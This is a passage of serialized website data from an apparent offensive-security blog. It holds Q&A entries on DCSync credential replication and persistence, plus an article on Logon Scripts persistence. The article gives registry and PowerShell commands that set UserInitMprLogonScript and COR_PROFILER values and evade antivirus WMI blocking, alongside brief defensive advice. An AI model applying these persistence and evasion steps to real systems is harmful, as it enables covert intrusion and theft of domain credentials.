href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-maintain-domain-persistence-by-adding-dcsync-rights-to-a-reg-1777477615478","DCSync, persistence, ACE, Shadow Admin, ACL",{"id":13,"title":14,"slug":15,"description":16,"content":161,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":167,"tags":168,"qaPairs":169,"meta":171,"updatedAt":55,"createdAt":56,"_status":57},{"root":162},{"type":19,"format":20,"indent":21,"version":22,"children":163,"direction":31},[164],{"type":25,"format":20,"indent":21,"version":22,"children":165,"direction":31},[166],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":170,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:52.485Z",{"id":50,"question":174,"answer":175,"answerHtml":176,"slug":177,"keywords":178,"article":179,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":191,"createdAt":191,"_status":57},"What privileges are required to perform a DCSync attack and export domain user hashes?","To execute DCSync, an attacker needs permissions of users in the Administrators, Domain Admins, Enterprise Admins groups, or the computer account of the domain controller. These high-level privileges allow replication of credentials via the DRS protocol.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>To execute DCSync, an attacker needs permissions of users in the Administrators, Domain Admins, Enterprise Admins groups, or the computer account of the domain controller. These high-level privileges allow replication of credentials via the DRS protocol.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-privileges-are-required-to-perform-a-dcsync-attack-and-export-domain-user-h-1777477615419","DCSync, privileges, Domain Admins, Enterprise Admins, domain controller",{"id":13,"title":14,"slug":15,"description":16,"content":180,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":186,"tags":187,"qaPairs":188,"meta":190,"updatedAt":55,"createdAt":56,"_status":57},{"root":181},{"type":19,"format":20,"indent":21,"version":22,"children":182,"direction":31},[183],{"type":25,"format":20,"indent":21,"version":22,"children":184,"direction":31},[185],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":189,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:52.196Z",{"id":51,"question":193,"answer":194,"answerHtml":195,"slug":196,"keywords":197,"article":198,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":210,"createdAt":210,"_status":57},"What is DCSync and what protocol does it use to replicate user credentials?","DCSync is a technique in mimikatz that uses the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller. It calls IDL_DRSGetNCChanges to export password hashes of all domain users, enabling attackers to escalate privileges or move laterally.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>DCSync is a technique in mimikatz that uses the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller. It calls IDL_DRSGetNCChanges to export password hashes of all domain users, enabling attackers to escalate privileges or move laterally.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dcsync-and-what-protocol-does-it-use-to-replicate-user-credentials-1777477615358","DCSync, mimikatz, DRS protocol, IDL_DRSGetNCChanges",{"id":13,"title":14,"slug":15,"description":16,"content":199,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":205,"tags":206,"qaPairs":207,"meta":209,"updatedAt":55,"createdAt":56,"_status":57},{"root":200},{"type":19,"format":20,"indent":21,"version":22,"children":201,"direction":31},[202],{"type":25,"format":20,"indent":21,"version":22,"children":203,"direction":31},[204],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":208,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:51.865Z",{"id":52,"question":212,"answer":213,"answerHtml":214,"slug":215,"keywords":216,"article":217,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":229,"createdAt":229,"_status":57},"What protocol does DCSync exploit to replicate credentials?","DCSync exploits the Directory Replication Service (DRS) protocol, specifically the IDL_DRSGetNCChanges method, to request replication of user credentials from a domain controller. This protocol is normally used by domain controllers to synchronize directory information.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>DCSync exploits the Directory Replication Service (DRS) protocol, specifically the IDL_DRSGetNCChanges method, to request replication of user credentials from a domain controller. This protocol is normally used by domain controllers to synchronize directory information.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-protocol-does-dcsync-exploit-to-replicate-credentials-1777477549843","DCSync protocol, DRS, IDL_DRSGetNCChanges, credential replication, Active Directory",{"id":13,"title":14,"slug":15,"description":16,"content":218,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":224,"tags":225,"qaPairs":226,"meta":228,"updatedAt":55,"createdAt":56,"_status":57},{"root":219},{"type":19,"format":20,"indent":21,"version":22,"children":220,"direction":31},[221],{"type":25,"format":20,"indent":21,"version":22,"children":222,"direction":31},[223],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":227,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:51.569Z",{"id":231,"question":232,"answer":233,"answerHtml":234,"slug":235,"keywords":236,"article":237,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":249,"createdAt":249,"_status":57},1279,"How can DCSync backdoors be detected automatically?","Automated detection can be performed using tools like ACLight, which enumerates ACLs of all Active Directory objects and identifies users with excessive privileges (e.g., DCSync rights) that are not members of built-in admin groups. ACLight generates reports listing privileged accounts, including 'Irregular Accounts' that pose a security risk.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>Automated detection can be performed using tools like ACLight, which enumerates ACLs of all Active Directory objects and identifies users with excessive privileges (e.g., DCSync rights) that are not members of built-in admin groups. ACLight generates reports listing privileged accounts, including &#39;Irregular Accounts&#39; that pose a security risk.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-dcsync-backdoors-be-detected-automatically-1777477549711","DCSync detection, ACLight, Active Directory ACLs, Shadow Admin detection, privileged account",{"id":13,"title":14,"slug":15,"description":16,"content":238,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":244,"tags":245,"qaPairs":246,"meta":248,"updatedAt":55,"createdAt":56,"_status":57},{"root":239},{"type":19,"format":20,"indent":21,"version":22,"children":240,"direction":31},[241],{"type":25,"format":20,"indent":21,"version":22,"children":242,"direction":31},[243],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":247,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:51.275Z",{"id":251,"question":252,"answer":253,"answerHtml":254,"slug":255,"keywords":256,"article":257,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":269,"createdAt":269,"_status":57},1278,"How can an attacker maintain persistence using DCSync without being a Domain Admin?","An attacker can grant DCSync rights to a regular domain user by adding specific Access Control Entries (ACEs) to the domain object using tools like PowerView. The required ACEs are DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes (with a specific GUID). This 'Shadow Admin' can then export all domain hashes without being a member of high-privilege groups.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>An attacker can grant DCSync rights to a regular domain user by adding specific Access Control Entries (ACEs) to the domain object using tools like PowerView. The required ACEs are DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes (with a specific GUID). This &#39;Shadow Admin&#39; can then export all domain hashes without being a member of high-privilege groups.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-maintain-persistence-using-dcsync-without-being-a-domain-adm-1777477549651","DCSync persistence, Shadow Admin, ACEs, PowerView, Active Directory ACL",{"id":13,"title":14,"slug":15,"description":16,"content":258,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":264,"tags":265,"qaPairs":266,"meta":268,"updatedAt":55,"createdAt":56,"_status":57},{"root":259},{"type":19,"format":20,"indent":21,"version":22,"children":260,"direction":31},[261],{"type":25,"format":20,"indent":21,"version":22,"children":262,"direction":31},[263],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":267,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:50.869Z",{"id":271,"question":272,"answer":273,"answerHtml":274,"slug":275,"keywords":276,"article":277,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":289,"createdAt":289,"_status":57},1277,"What are the prerequisites to perform a DCSync attack?","To perform DCSync, an attacker must have compromised an account that is a member of one of the following groups: Domain Admins, Enterprise Admins, Administrators on the domain controller, or the domain controller's computer account. These privileges allow the use of the IDL_DRSGetNCChanges method to replicate credentials.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>To perform DCSync, an attacker must have compromised an account that is a member of one of the following groups: Domain Admins, Enterprise Admins, Administrators on the domain controller, or the domain controller&#39;s computer account. These privileges allow the use of the IDL_DRSGetNCChanges method to replicate credentials.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-prerequisites-to-perform-a-dcsync-attack-1777477549590","DCSync prerequisites, Domain Admins, Enterprise Admins, DRS replication, credential harvesting",{"id":13,"title":14,"slug":15,"description":16,"content":278,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":284,"tags":285,"qaPairs":286,"meta":288,"updatedAt":55,"createdAt":56,"_status":57},{"root":279},{"type":19,"format":20,"indent":21,"version":22,"children":280,"direction":31},[281],{"type":25,"format":20,"indent":21,"version":22,"children":282,"direction":31},[283],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":287,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:50.466Z",{"id":291,"question":292,"answer":293,"answerHtml":294,"slug":295,"keywords":296,"article":297,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":309,"createdAt":309,"_status":57},1276,"What is DCSync and what does it do?","DCSync is a feature in mimikatz that allows an attacker to simulate a domain controller's replication behavior and request password hashes for all domain users from a legitimate domain controller using the DRS (Directory Replication Service) protocol. It is commonly used to harvest credential material for lateral movement or privilege escalation in Active Directory environments.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>DCSync is a feature in mimikatz that allows an attacker to simulate a domain controller&#39;s replication behavior and request password hashes for all domain users from a legitimate domain controller using the DRS (Directory Replication Service) protocol. It is commonly used to harvest credential material for lateral movement or privilege escalation in Active Directory environments.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dcsync-and-what-does-it-do-1777477549522","DCSync, mimikatz, DRS protocol, domain controller, password hash",{"id":13,"title":14,"slug":15,"description":16,"content":298,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":304,"tags":305,"qaPairs":306,"meta":308,"updatedAt":55,"createdAt":56,"_status":57},{"root":299},{"type":19,"format":20,"indent":21,"version":22,"children":300,"direction":31},[301],{"type":25,"format":20,"indent":21,"version":22,"children":302,"direction":31},[303],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":307,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:49.131Z",{"id":311,"question":312,"answer":313,"answerHtml":314,"slug":315,"keywords":316,"article":317,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":364,"createdAt":364,"_status":57},1275,"What is the recommended defense against Logon Scripts persistence?","The primary defense is to monitor the registry key `HKCU\\Environment\\UserInitMprLogonScript` for any unauthorized modifications. Unusual or unexpected scripts set as the value indicate a potential persistence mechanism. Additionally, security teams should track changes to environment variables under `HKCU\\Environment`. For more context, refer to the [Logon Scripts article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).","\u003Cp>The primary defense is to monitor the registry key `HKCU\\Environment\\UserInitMprLogonScript` for any unauthorized modifications. Unusual or unexpected scripts set as the value indicate a potential persistence mechanism. Additionally, security teams should track changes to environment variables under `HKCU\\Environment`. For more context, refer to the [Logon Scripts article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-recommended-defense-against-logon-scripts-persistence-1777479956871","defense, registry monitoring, UserInitMprLogonScript, persistence detection",{"id":318,"title":319,"slug":320,"description":321,"content":322,"contentHtml":329,"cover":330,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":346,"tags":349,"qaPairs":350,"meta":361,"updatedAt":362,"createdAt":363,"_status":57},298,"Use Logon Scripts to maintain persistence","use-logon-scripts-to-maintain-persistence","Learn how Logon Scripts execute before antivirus, enabling persistence and bypassing security. Includes WMI bypass and defense tips.",{"root":323},{"type":19,"format":20,"indent":21,"version":22,"children":324,"direction":31},[325],{"type":25,"format":20,"indent":21,"version":22,"children":326,"direction":31},[327],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},"\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article continues the series on backdoor exploitation methods, focusing on the use of Logon Scripts. During my research, I discovered a particular technique where scripts execute before antivirus software, allowing them to bypass antivirus interception of sensitive operations. This article will detail this technique.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some antivirus software can start before Logon Scripts.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Usage of Logon Scripts\u003C\u002Fli>\u003Cli>Bypassing 360's interception of WMI calls\u003C\u002Fli>\u003Cli>Special Techniques\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Usage of Logon Scripts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The idea originates from Adam@Hexacorn, with the following address:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.hexacorn.com\u002Fblog\u002F2014\u002F11\u002F14\u002Fbeyond-good-ol-run-key-part-18\u002F\u003C\u002Fp>\u003Ch3>Brief introduction to the usage of Logon Scripts\u003C\u002Fh3>\u003Cp>Registry path: HKCU\\Environment\\\u003C\u002Fp>\u003Cp>Create string key value: UserInitMprLogonScript\u003C\u002Fp>\u003Cp>Set key value to absolute path of bat: c:\\test\\11.bat\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016714386_0_81861fd612.jpeg\">\u003C\u002Fp>\u003Cp>The content of the bat is as follows:\u003C\u002Fp>\u003Cp>start calc.exe\u003C\u002Fp>\u003Cp>Log off, log on\u003C\u002Fp>\u003Cp>Execute script 11.bat, calculator pops up\u003C\u002Fp>\u003Ch2>0x03 Bypass 360's interception of modifying environment variables via WMI\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>As mentioned in the previous article 'Use CLR to maintain persistence', the method of using wmic to modify environment variables\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"COR_ENABLE_PROFILING\",username=\"%username%\",VariableValue=\"1\"\u003Cbr>\u003Cbr>wmic ENVIRONMENT create name=\"COR_PROFILER\",username=\"%username%\",VariableValue=\"{11111111-1111-1111-1111-111111111111}\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, 360 will intercept WMI operations, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016717261_1_b0cdc42c34.jpeg\">\u003C\u002Fp>\u003Cp>In fact, adding environment variables via WMI is equivalent to creating key-values in the registry HKCR\\Environment\\\u003C\u002Fp>\u003Cp>Therefore, WMI operations can be replaced by writing to the registry\u003C\u002Fp>\u003Cp>The above WMI command can be replaced with the following PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" COR_ENABLE_PROFILING -value \"1\" -propertyType string | Out-Null\u003Cbr>\u003Cbr>New-ItemProperty \"HKCU:\\Environment\\\" COR_PROFILER -value \"{11111111-1111-1111-1111-111111111111}\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Special Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Originating from a unique idea of mine\u003C\u002Fp>\u003Cp>During my research on this technique, I had an interesting thought: Do Logon Scripts start before other programs?\u003C\u002Fp>\u003Cp>If so, do they also start before antivirus software?\u003C\u002Fp>\u003Cp>Now, let's begin my test:\u003C\u002Fp>\u003Ch3>1. Enter the following code in cmd:\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"test\",username=\"%username%\",VariableValue=\"I run faster!\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As expected, it was blocked\u003C\u002Fp>\u003Ch3>2. Setting Logon Scripts\u003C\u002Fh3>\u003Cp>The code for 11.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"test\",username=\"%username%\",VariableValue=\"I run faster!\"\u003Cbr>reg query HKEY_CURRENT_USER\\Environment \u002FV test\u003Cbr>pause\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Enabling Logon Scripts\u003C\u002Fh3>\u003Cp>Registry path: HKCR\\Environment\\\u003C\u002Fp>\u003Cp>Create a string key value: UserInitMprLogonScript\u003C\u002Fp>\u003Cp>Set the key value to the absolute path of the bat file: c:\\test\\11.bat\u003C\u002Fp>\u003Cp>Since calling WMI will be blocked, it can be implemented via PowerShell with the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" UserInitMprLogonScript -value \"c:\\test\\11.bat\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Log off, log back in, and test\u003C\u002Fh3>\u003Cp>If the registry HKCR\\Environment\\ is successfully written with the key value test REG_SZ I run faster!, it indicates that Logon Scripts execute before antivirus software, bypassing its restrictions\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016723345_2_d09ecdd162.png\">\u003C\u002Fp>\u003Cp>Test successful, verifying our conclusion\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor registry key HKCR\\Environment\\UserInitMprLogonScript\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests the usage of Logon Scripts and introduces a special application: Logon Scripts can execute before antivirus software, bypassing its interception of sensitive operations.\u003C\u002Fp>\u003Cp>From a defensive perspective, vigilance should be maintained against this.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 